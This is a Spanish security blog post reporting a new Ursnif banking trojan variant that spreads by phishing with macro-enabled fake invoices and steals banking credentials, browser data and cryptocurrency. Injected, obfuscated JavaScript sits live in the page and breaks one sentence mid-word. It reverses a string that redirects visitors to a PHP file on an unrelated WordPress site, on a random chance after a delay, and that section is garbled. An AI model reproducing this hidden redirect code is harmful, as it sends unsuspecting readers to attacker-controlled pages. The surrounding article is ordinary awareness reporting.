Reaparece un malware bancario con nuevas técnicas para infectar tu PC
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tok=ClbO2fVn” width=”855″ height=”570″ /></p>
<p>Un equipo de investigadores de la compañía de seguridad Cybereason ha descubier<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to una nueva versión de Ursnif, un malware bancario que fue detectado por primera vez en el año 2007 y que ahora ha vuelto con nuevas técnicas para infectar tu PC y robar tus datos.
El troyano bancario Ursnif es una de las formas de malware para el robo de información más populares que existen. Como decíamos, la primera detección se realizó allá por el año 2007, y desde entonces han aparecido muchas variantes en infinidad de campañas. El objetivo de este virus es robar la información financiera de las víctimas, así como sus nombres de usuario, contraseña y otros datos confidenciales.
En los últimos años este troyano bancario se ha popularizado debido a que su código fuente se filtró en GitHub, lo que ha permitido que ciberdelincuentes de todo el mundo lo utilicen y añadan nuevas funciones. De hecho, recientemente se han detectado campañas activas del malware bancario Ursnif dirigidas a Italia, Países Bajos, Rusia, Ucrania o Estados Unidos.
Ahora, la nueva variante de este virus bancario descubierta por los investigadores de Cybereason aplica tácticas de infección diferentes, más peligrosas y discretas que las de otras campañas, que le permiten eludir con mayor facilidad la detección de los programas antivirus.
El vector de la infección son campañas de phishing mediante correos electrónicos que solicitan a la víctima que abra un archivo adjunto, en la mayoría de los casos una factura falsa que solicita que se habiliten las macros de Office. En caso de hacerlo, se desencadena el proceso de infección del ordenador.
Una vez que se instala la carga útil en el PC de la víctima, el troyano roba los datos bancarios y las contraseñas, es capaz de extraer información de los navegadores y datos de los correos electrónicos, y también puede robar bitcoins y otras criptomonedas.
Para evitar ser una víctima de este tipo de ataques, recuerda revisar siempre tu bandeja de entrada con mucha precaución y no descargar nunca archivos adjuntos de remitentes sospechosos. Además, si un documento que has descargado te pide que habilites las macros, desconfía porque puede tratarse de un intento de infección.
Ver información originaL al respecto en Fuente>
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.